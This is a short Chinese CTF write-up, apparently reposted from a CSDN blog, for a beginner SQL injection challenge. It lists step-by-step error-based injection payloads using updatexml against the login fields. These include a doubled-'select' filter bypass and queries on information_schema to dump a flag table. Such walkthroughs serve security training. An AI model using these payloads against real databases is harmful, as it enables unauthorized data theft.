数据库
首页 > 数据库> > NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-2-wp

NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-2-wp

作者:互联网

sql注入-2

根据网页源代码hint添加get型参数tips

bp抓包,可以发现存在两个post型参数,name和pass,尝试了一番union联合查询注入,无法利用,遂改报错注入,这里使用updatexml

发现可以正常注入

name=admin' and updatexml(1,concat(0x7e,(select 1),0x7e),1)#&pass=111111

查当前数据库 note

name=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=111111

查表(note) fl4g

name=admin' and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111	//失败,可能过滤了一些字符

name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111	//双写select绕过

查字段(fl4g) flag

name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(column_name) from information_schema.columns where table_name='fl4g' limit 0,1),0x7e),1)#&pass=111111

dump数据

name=admin' and updatexml(1,concat(0x7e,(seselectlect flag from fl4g),0x7e),1)#&pass=111111

I

标签:NU1LCTFer,name,pass,0x7e,#&,sql,updatexml,concat,注入
来源: https://blog.csdn.net/weixin_46439278/article/details/118343647